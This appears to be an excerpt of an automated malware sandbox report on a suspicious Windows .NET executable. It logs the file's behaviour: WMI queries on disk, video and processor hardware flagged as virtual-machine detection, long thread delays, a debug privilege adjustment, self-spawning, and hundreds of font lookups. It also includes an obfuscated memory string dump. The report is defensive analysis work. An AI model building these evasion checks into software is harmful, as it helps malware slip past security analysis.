Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7348, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Memory allocated: 17A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Memory allocated: 3110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Memory allocated: 5110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Memory allocated: 9330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Memory allocated: A330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Memory allocated: A540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Memory allocated: B540000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Memory allocated: 13A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Memory allocated: 2C70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Window / User API: threadDelayed 1316			Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Window / User API: threadDelayed 8365			Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe TID: 7368	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe TID: 7744	Thread sleep time: -31359464925306218s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743846238.0000000007910000.00000004.08000000.00040000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000000.00000002.1741731894.00000000042A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: mKU4ufKcuQsUByve7rdGifh134lxgMSiHuBPKrbPlcdILT9DBisIs8LXtXutRj3L0weLOGZYOvgDLvlIuWaHtj4c6onR5ufim1TusAStd8roCmxdKqWHRvJdY9P2C6UserControlSystem.Windows.FormsRajN0UgjoygJBEeacrUITypeEditorSystem.Drawing.DesignSystem.DrawingUoB2qHDX9aTV4KNpvmEnumJa92gPptpOjiMw1MkYOgfda3aHma5cOApc7NqyyPq296Qkh0EGin1jaAHAXU6TOKSHsItCekMulticastDelegatecPkqCWq8elSP3JBGEmP5pHa6cEJfJ4NtkGB1DZl76dVMrkY6DZZ3ImHKwLip1qWWjhjw5wRaerWWqdUG5WmofljShXmNNd9aegiqeJYA1sgrmElWpXHIIvxbStWSQ6Nqlq3K70SNA85KZUHbTtBkyNugKLPuu0AGfynF9t9kbbEXdDLO9M6rruJRCxQmSq7fXYlu6DnudeaGi5Q5BiDcNPvSFkKqEonKD3jfZUbQNkwEOxkQwJLT36txv3DHsjNBXrFNOBQGRxWOIsjjFtv9EfjTu5rfJc6UMOaX5w0soayuX1Sqyrvk16DeAQ76dOfLt3q8CbEkx7OcEo45sYRyHSy6MtKRTRQ761NRoTt8oxFBU42wJTr2UTVcBSHdUXMlxGN4ahivbs0OqBd4H5tgmR5ZnW4VeiSHo6SojuYakG6IgwZLsUAIOdIcSLdRicLlbIX20XssoluT29qFK7Ile48P9lk1yt1w0l7YPERuxfOi4N3h5FDagi8rzrJtLHf02N11alqrhwUFuoQeCdlpIA3uNJJllUNJeVBrbJ1j7kjRgQbD37EoNqtrph9p0XKioVryvvYdQj7id7651qNr58I0StO1AvChb1yyEventArgsLeXIV6JlxYG286jECPApplicationExceptionYBBGBdLdRgRLbm4owHc0npjGZVC8QoekSSiEUeK7EHGFSG5neVbdSwwhT9VAvWrWdOTj3EWOqYwR0TMDtDIN8pqpVUeST8V05Lk8UgBG2UPKEuOpUCriLBxCLqaAMUfveyHcscgRsunRk5twFormXb5Y0G81yEhmDCB4ALh3TbBgPKWJM3k3GmXIfRMpebh3HnJSGfKfL5RandomxGWxxQzs6QMPuKRFe2Ko28UW3XlevF8QFhQ37ExpandableObjectConverterSystem.ComponentModelbiOSFH33IeY62QRJA5uG5HkYS3K1F7W131ParxqGWQwo3dZPjlkLfaXEbKxSlmh3RWIExw3kFaGD<Module>{0E8AD44F-B4A1-4840-98C6-7AC987A82628}Mk6DYM3lSyNJikYKa2qJ2JoNQ3mpCYYwsxJOGStOChuT3DZIFp33gldyx<PrivateImplementationDetails>{A8B78495-69A5-4CBF-8D75-C5304FB59F70}__StaticArrayInitTypeSize=256__StaticArrayInitTypeSize=40__StaticArrayInitTypeSize=30__StaticArrayInitTypeSize=32__StaticArrayInitTypeSize=16__StaticArrayInitTypeSize=64__StaticArrayInitTypeSize=18
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1875228155.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743846238.0000000007910000.00000004.08000000.00040000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000000.00000002.1741731894.00000000042A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UeK7EHGFSG5neVbdSw

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe

Process created: C:\Users\user\Desktop\ljMiHZ8MwZ.exe "C:\Users\user\Desktop\ljMiHZ8MwZ.exe"

Jump to behavior

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Users\user\Desktop\ljMiHZ8MwZ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
